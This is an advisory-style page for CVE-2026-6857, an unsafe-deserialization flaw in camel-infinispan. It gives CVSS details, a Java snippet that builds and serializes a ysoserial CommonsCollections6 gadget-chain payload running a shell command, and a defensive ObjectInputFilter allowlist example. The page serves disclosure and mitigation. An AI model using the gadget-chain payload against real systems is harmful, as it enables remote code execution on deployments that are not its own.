Security Vulnerability Report
CVE-2026-6857 CVSS 7.5 HIGH

Published: 2026-04-22 13:16:23
Last Modified: 2026-05-21 15:16:30

Description

A flaw was found in camel-infinispan. This vulnerability involves unsafe deserialization in the ProtoStream remote aggregation repository. A remote attacker with low privileges could exploit this by sending specially crafted data, leading to arbitrary code execution. This allows the attacker to gain full control over the affected system, impacting its confidentiality, integrity, and availability.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploitability sub-score: 1.6; Impact sub-score: 5.9 (Red Hat, secondary metric)
Weakness: CWE-502 (Deserialization of Untrusted Data)

Reading the vector: the flaw is reachable over the network by a low-privileged account with no user interaction and yields full confidentiality, integrity and availability impact, but attack complexity is rated High. That single component is what holds the base score at 7.5; the same vector with AC:L would score 8.8. Treat the "low privileges" as the ability to write data that the aggregation repository later deserializes.

Configurations (Affected Products)

No CPE configuration data is available in the NVD record yet (vulnStatus: Awaiting Analysis).

Affected product: camel-infinispan. For the specific affected versions, refer to the vendor security advisory (Red Hat errata RHSA-2026:17668).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
The snippet is Java, not Python, and is a payload-generation sketch only: it shows a Java-serialization gadget-chain object being serialized with ysoserial, and does not exercise the camel-infinispan code path or any network endpoint. The original called a non-existent ysoserial method and serialized the payload generator rather than the generated object; both are corrected below.

```java
/*
 * Conceptual PoC for Unsafe Deserialization in camel-infinispan (CVE-2026-6857).
 * This only demonstrates how a malicious object might be serialized; it does
 * not deliver it anywhere.
 */
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;

import ysoserial.payloads.ObjectPayload;

public class CVE2026_6857_PoC {
    public static void main(String[] args) throws Exception {
        // Build the gadget-chain object (e.g. CommonsCollections6).
        // Classpath must contain ysoserial and the gadget's dependency
        // (commons-collections 3.x for this chain).
        Object payload = ObjectPayload.Utils.makePayloadObject(
                "CommonsCollections6", "touch /tmp/pwned");

        // Serialize the gadget object itself, not the ObjectPayload generator.
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(payload);
        }
        byte[] serializedData = bos.toByteArray();

        // In a real attack, 'serializedData' would be delivered to the
        // affected ProtoStream remote aggregation repository endpoint.
        System.out.println("Malicious payload generated. Length: " + serializedData.length);
        // sendToTarget(serializedData);
    }
}
```
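The defensive counterpart, added here as an example and not code from camel-infinispan or from the Red Hat fix: the generic CWE-502 mitigation on the JVM is to stop the gadget class from ever being instantiated, which a JEP 290 ObjectInputFilter does in resolveClass, before any constructor, readObject or readResolve of the incoming class runs. The allowlist contents, the class names and the sample data are assumptions chosen for the demonstration; java.util.HashMap merely stands in for a class outside the allowlist, the way a gadget class would be. Requires Java 9 or later.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

public class DeserializationAllowlistDemo {

    // Hypothetical allowlist for this demo: only the named classes may be
    // instantiated, "!*" rejects every other class, and maxdepth bounds
    // object nesting so a deeply nested stream cannot exhaust the stack.
    static final ObjectInputFilter ALLOWLIST = ObjectInputFilter.Config.createFilter(
            "maxdepth=10;java.lang.String;java.util.ArrayList;!*");

    static byte[] serialize(Object o) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Unsafe pattern: instantiates whatever class names the stream carries.
    static Object deserializeUnfiltered(byte[] data) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        }
    }

    // Hardened pattern: the filter is consulted for every class descriptor in
    // the stream before that class is resolved or instantiated.
    static Object deserializeFiltered(byte[] data) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(ALLOWLIST);
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: an allowlisted type carrying allowlisted elements.
        // (Wrapped in ArrayList because List.of(...) serializes as an
        // ImmutableCollections class, which the allowlist would reject.)
        List<String> expected = new ArrayList<>(List.of("order-1", "order-2"));
        byte[] ok = serialize(expected);
        System.out.println("filtered, allowlisted type: " + deserializeFiltered(ok));

        // Constructed sample standing in for a gadget-bearing payload: any
        // class not on the allowlist.
        Map<String, String> notAllowed = new HashMap<>();
        notAllowed.put("k", "v");
        byte[] bad = serialize(notAllowed);
        System.out.println("unfiltered, any type: " + deserializeUnfiltered(bad));
        try {
            deserializeFiltered(bad);
            System.out.println("BUG: filter did not reject");
        } catch (InvalidClassException e) {
            // Expected: the stream is rejected before HashMap is instantiated.
            System.out.println("filtered, rejected: " + e.getMessage());
        }
    }
}
```

Two caveats for applying this to an incident like the one above. First, a per-stream filter only protects streams you create; for a library that opens its own ObjectInputStream, set the filter process-wide with the -Djdk.serialFilter system property or ObjectInputFilter.Config.setSerialFilter(...) so it also covers those paths. Second, the JDK filter only sees java.io.ObjectInputStream; if the vulnerable component deserializes through a different marshaller, the filter never runs, so the vendor fix remains the authoritative remediation and the filter is defence in depth.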

References

https://access.redhat.com/errata/RHSA-2026:17668
https://access.redhat.com/security/cve/CVE-2026-6857
https://bugzilla.redhat.com/show_bug.cgi?id=2460003

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-6857",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-22T13:16:22.583",
    "lastModified": "2026-05-21T15:16:30.200",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in camel-infinispan. This vulnerability involves unsafe deserialization in the ProtoStream remote aggregation repository. A remote attacker with low privileges could exploit this by sending specially crafted data, leading to arbitrary code execution. This allows the attacker to gain full control over the affected system, impacting its confidentiality, integrity, and availability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://access.redhat.com/errata/RHSA-2026:17668",
        "source": "[email protected]"
      },
      {
        "url": "https://access.redhat.com/security/cve/CVE-2026-6857",
        "source": "[email protected]"
      },
      {
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460003",
        "source": "[email protected]"
      }
    ]
  }
}
```